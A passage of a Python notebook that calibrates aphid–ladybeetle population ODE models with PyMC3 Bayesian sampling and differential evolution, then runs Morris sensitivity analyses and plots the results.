observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters (same as the fine model)
    r1_ = pm.Uniform(
        "r1",
        lower=(1.0 - percent_calibration) * r1,
        upper=(1.0 + 20 * percent_calibration) * r1,
    )
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + 20 * percent_calibration) * r3,
    )
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # a1_ = pm.Data("a1", a1)
    # Priors for Initial Conditions (held fixed as data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP1_model",
        AP1_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse level 2 for MLDA: same model, every 2nd observation.
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    r1_ = pm.Uniform(
        "r1",
        lower=(1.0 - percent_calibration) * r1,
        upper=(1.0 + 20 * percent_calibration) * r1,
    )
    # r2_ = pm.Uniform(
    #     "r2",
    #     lower=(1.0 - percent_calibration) * r2,
    #     upper=(1.0 + percent_calibration) * r2,
    # )
    r2_ = pm.Data("r2", r2)
    r3_ = pm.Uniform(
        "r3",
        lower=(1.0 - percent_calibration) * r3,
        upper=(1.0 + 20 * percent_calibration) * r3,
    )
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # a1_ = pm.Data("a1", a1)
    # Priors for Initial Conditions (held fixed as data)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 here, but the fine model and coarse_model_1
    # use lower=1 — possibly a typo; confirm the intended prior bound.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "AP1_model",
        AP1_ode_wrapper(
            time_calibration,
            r1_,
            r2_,
            r3_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# Multi-Level Delayed Acceptance sampling on the fine model.
with fine_model_AP1:
    # NOTE(review): only coarse_model_1 is passed; coarse_model_2 defined
    # above is unused — confirm whether it should be included here.
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_AP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
# Quick visual check of the r1 posterior.
plt.hist(trace_calibration_AP1['r1'], bins=35)
plt.show()
# In[ ]:
# Variables summarized and plotted in the cells below.
calibration_variable_names = [
    "std_deviation",
    "r1",
    "r3",
    "a1", # included a1
]
# In[ ]:
# Plot and save the posterior histogram of each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable_name in progress_bar:
    pm.plot_posterior(
        trace_calibration_AP1[::plot_step],
        var_names=variable_name,
        kind="hist",
        round_to=4,
        point_estimate="mode",
    )
    plt.savefig(f"img/{variable_name}_posterior_cal_AP1.png")
# In[ ]:
# Pairwise joint posteriors (hexbin) with marginal distributions.
az.plot_pair(
    trace_calibration_AP1,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_AP1.png")
# In[ ]:
df_stats_summary = az.summary(
    data=trace_calibration_AP1,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the MPV (KDE mode) for each variable in a PyMC trace.

    Vector-valued variables (2-D realization arrays: draws x components)
    are split into one entry per component, keyed ``"name[dim]"``.
    Removes the redundant f-string wrappers around plain string keys.
    """
    rv_mpv_values_dict = dict()
    progress_bar = tqdm(variable_names)
    for variable in progress_bar:
        progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
        rv_realization_values = pm_trace[variable]
        # Scalar RVs have 1-D realization arrays (shape[1] raises).
        try:
            num_of_dimensions = rv_realization_values.shape[1]
        except IndexError:
            num_of_dimensions = 0
        if num_of_dimensions == 0:
            rv_mpv_values_dict[variable] = _scalar_rv_mvp_estimation(rv_realization_values)
        else:
            for dimension in range(num_of_dimensions):
                component_values = np.array(rv_realization_values[:, dimension])
                rv_mpv_values_dict[f"{variable}[{dimension}]"] = _scalar_rv_mvp_estimation(component_values)
    return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of the ArviZ summary with an extra 'mpv' column."""
    summary_with_mpv = arviz_summary.copy()
    # pd.Series aligns the dict's keys with the summary's index.
    summary_with_mpv["mpv"] = pd.Series(rv_modes_dict)
    return summary_with_mpv
# In[ ]:
# Attach the MPV estimates to the summary and persist it.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_AP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_AP1.csv")  # saved to CSV for later reference
df_stats_summary
# In[ ]:
# Posterior predictive band: 2.5th/97.5th percentiles plus the median fit.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_AP1["AP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_AP1["AP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_AP1["AP1_model"], 50, axis=0)
# In[ ]:
# Median fit with 95% credible band against the observed data.
plt.figure(figsize=(15, 5))
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_AP1.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict()  # also record the realizations in a Python dict
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_AP1.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_AP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Allee Prey Growth FR2 model
# ## I can't reach a sinusoidal pattern for all calibrated parameters
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def AP2_model(
    t,
    X,
    r1 = 1,
    r2 = 1,
    r3 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """RHS of the AP2 system: Allee prey growth with a Holling type II
    (FR2) predation term; the predator density is held constant."""
    u, v = X
    growth_term = r1 * u - r2 * u * u
    allee_term = r2 * u * u - r3 * u
    predation_term = a1 * u * v / (a2 + a3 * u)
    u_prime = growth_term * allee_term - predation_term
    v_prime = 0
    return u_prime, v_prime
def AP2_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    r2 = 1,
    r3 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the AP2 model with LSODA and return the scipy solution
    object evaluated at ``t_eval``."""
    return solve_ivp(
        fun=AP2_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=(r1, r2, r3, a1, a2, a3),
        method="LSODA",
    )
# Simulation time grid and observed series for the AP2 fit.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def AP2_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual between AP2 output and data.

    Parameters
    ----------
    par : sequence
        Model parameters forwarded to ``fitting_model``.
    time_exp : np.ndarray
        Experimental observation times.
    f_exp : sequence of two arrays
        Observed series (prey, predator).
    fitting_model : callable
        Solver with signature ``(y0, t_span, t_eval, *par)`` returning an
        object with ``.t`` and ``.y`` attributes.
    initial_conditions : sequence
        Initial state passed to the solver.

    Returns
    -------
    float
        Mean of the two weighted sums of squared residuals, or the large
        penalty 1e15 when the solver raises ValueError.
    """
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *par)
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Integration blow-ups are penalized rather than propagated so
        # global optimizers can keep exploring the parameter space.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Progress callback for differential evolution: print the current
    best parameter vector at each iteration."""
    print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
# NOTE(review): 'seed' is rebound here (1234) for the DE run; earlier code
# also uses a module-level 'seed' — confirm both are intended to match.
seed = 1234
# Starting point: previously calibrated AP2 parameter values.
r1=0.11562168675891937
r2=9.074476369486926e-07
r3=0.0020683597238106855
a1=0.0019297724951409106
a2=0.8083006578721604
a3=2.95741489956641e-05
# Search box: +/-90% around each starting value.
denom_min = 0.1
denom_max = 1.9
bounds_AP2 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
    ( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
    ( ( r3 * denom_min ), ( r3 * denom_max ) ), # r3
    ( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
    ( ( a2 * denom_min ), ( a2 * denom_max ) ), # a2
    ( ( a3 * denom_min ), ( a3 * denom_max ) ), # a3
]
# Global least-squares calibration of the AP2 parameters.
result_AP2 = optimize.differential_evolution(
    AP2_least_squares_error_ode,
    bounds=bounds_AP2,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        AP2_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000, # 2000
    polish=True,
    disp=True,
    seed = seed, # for the sake of reproducibility
    callback=callback_de,
    workers=-1,
)
print(result_AP2)
# * Retrieving the calibrated parameter values:
# In[ ]:
# Re-simulate with the calibrated parameters on a finer (100-point) grid.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
    r1_deterministic,
    r2_deterministic,
    r3_deterministic,
    a1_deterministic,
    a2_deterministic,
    a3_deterministic,
) = result_AP2.x
solution_ODE_AP2 = AP2_ode_solver(
    y0,
    (t0, tf + days_to_forecast),
    time_range,
    *result_AP2.x
)
t_computed_AP2, y_computed_AP2 = solution_ODE_AP2.t, solution_ODE_AP2.y
u_AP2, v_AP2 = y_computed_AP2
parameters_dict = {
    "Model": "AP2",
    u"$r1$": r1_deterministic,
    u"$r2$": r2_deterministic,
    u"$r3$": r3_deterministic,
    u"$a1$": a1_deterministic,
    u"$a2$": a2_deterministic,
    u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "r3=" + str(r3_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
# Calibrated trajectories against the observed data.
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_AP2, u_AP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_AP2, v_AP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Morris (elementary effects) screening of the AP2 least-squares
# objective around the calibrated parameter values.
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
# Evaluate the objective for every Morris sample.
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = AP2_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        AP2_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
# NOTE(review): width=3 (>1) makes the bars overlap — presumably
# intentional for this single-column display; verify the rendered figure.
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_AP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
# Morris screening of the prey trajectory itself (time-resolved QoI).
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
# One full ODE solve per Morris sample; store the prey trajectory.
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_AP2 = AP2_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_AP2.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
# Time-resolved Morris analysis of the prey trajectory: one analysis per
# time point, with indices normalized to sum to one across parameters.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # A failed analysis at one time point just leaves NaNs (dropped
        # below).  A bare 'except:' would also swallow KeyboardInterrupt
        # and SystemExit, so catch Exception explicitly.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
# Stacked-bar plot of the normalized mu* indices over time (AP2, prey QoI).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# Tick positions arrive as floats; cast to int before indexing the numpy
# array (float indices raise IndexError), and guard out-of-range ticks.
ax.xaxis.set_major_formatter(
    lambda x, pos: f"{valid_times_to_plot_mu[int(x)]:.2f}"
    if 0 <= int(x) < len(valid_times_to_plot_mu) else ""
)
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_AP2.png", dpi=300)
plt.show()
# In[ ]:
# Stacked-bar plot of the normalized sigma indices over time (AP2, prey QoI).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# Tick positions arrive as floats; cast to int before indexing the numpy
# array (float indices raise IndexError), and guard out-of-range ticks.
ax.xaxis.set_major_formatter(
    lambda x, pos: f"{valid_times_to_plot_sigma[int(x)]:.2f}"
    if 0 <= int(x) < len(valid_times_to_plot_sigma) else ""
)
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_AP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate du/dt of the pest population along a computed trajectory.

    Parameters
    ----------
    time_array, u_array, v_array : array-like
        Times and the corresponding prey/predator densities.
    ode_model : callable
        RHS with signature ``(t, [u, v], *model_pars)`` returning
        ``(u_prime, v_prime)``.
    model_pars : sequence
        Extra parameters forwarded to ``ode_model``.

    Returns
    -------
    np.ndarray
        ``u_prime`` evaluated at every time point.
    """
    # zip avoids index bookkeeping and removes the previous shadowing of
    # the stdlib 'time' module by a loop variable.
    pest_time_derivative_values = [
        ode_model(t_value, [u_value, v_value], *model_pars)[0]
        for t_value, u_value, v_value in zip(time_array, u_array, v_array)
    ]
    return np.array(pest_time_derivative_values)
# In[ ]:
# du/dt along the calibrated AP2 trajectory, then plotted with u itself.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_AP2,
    u_AP2,
    v_AP2,
    AP2_model,
    mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_AP2, u_AP2, '-x', label='Pest population')
plt.plot(t_computed_AP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_AP2.png", dpi=300)
plt.show()
# In[ ]:
# Morris screening of du/dt (time-resolved QoI) for the AP2 model.
mean_values_params = [
    r1,
    r2,
    r3,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$r2$",
    r"$r3$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
# One ODE solve per Morris sample; store du/dt along the trajectory.
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_AP2 = AP2_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_AP2.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        AP2_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
# Time-resolved Morris analysis of du/dt: one analysis per time point,
# with indices normalized to sum to one across parameters.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # A failed analysis at one time point just leaves NaNs (dropped
        # below).  A bare 'except:' would also swallow KeyboardInterrupt
        # and SystemExit, so catch Exception explicitly.
        continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
# Stacked-bar plot of the normalized mu* indices over time (AP2, du/dt QoI).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# Tick positions arrive as floats; cast to int before indexing the numpy
# array (float indices raise IndexError), and guard out-of-range ticks.
ax.xaxis.set_major_formatter(
    lambda x, pos: f"{valid_times_to_plot_mu[int(x)]:.2f}"
    if 0 <= int(x) < len(valid_times_to_plot_mu) else ""
)
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_AP2.png", dpi=300)
plt.show()
# In[ ]:
# Stacked-bar plot of the normalized sigma indices over time (AP2, du/dt QoI).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# Tick positions arrive as floats; cast to int before indexing the numpy
# array (float indices raise IndexError), and guard out-of-range ticks.
ax.xaxis.set_major_formatter(
    lambda x, pos: f"{valid_times_to_plot_sigma[int(x)]:.2f}"
    if 0 <= int(x) < len(valid_times_to_plot_sigma) else ""
)
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_AP2.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,  # time_exp
        t.dscalar,  # r1
        t.dscalar,  # r2
        t.dscalar,  # r3
        t.dscalar,  # a1
        t.dscalar,  # a2
        t.dscalar,  # a3
        t.dscalar,  # u0
        t.dscalar,  # v0
    ],
    otypes=[t.dmatrix]
)
def AP2_ode_wrapper(time_exp, r1, r2, r3, a1, a2, a3, u0, v0):
    """Integrate the AP2 system as a theano op for PyMC3.

    Solves the ODE with LSODA over the span of ``time_exp`` and returns
    the two state trajectories as a (n_times, 2) array (aphids,
    ladybeetles), matching the shape of the observation matrix.
    """
    time_span = (time_exp.min(), time_exp.max())
    y_model = solve_ivp(
        AP2_model,
        time_span,
        np.array([u0, v0]),
        t_eval=time_exp,
        method='LSODA',
        args=[r1, r2, r3, a1, a2, a3],
    )
    # Stack the two state trajectories column-wise: (n_times, 2).
    return np.vstack(y_model.y).T
# In[ ]:
# Assemble the observation matrix (n_times x 2: aphids, ladybeetles)
# that serves as likelihood data for the AP2 Bayesian calibration.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
# NOTE(review): 'draws' is set here but pm.sample below is called with
# draws=4500 — this variable appears unused; confirm.
draws = 1000
start_time = time.time()
percent_calibration = 0.95
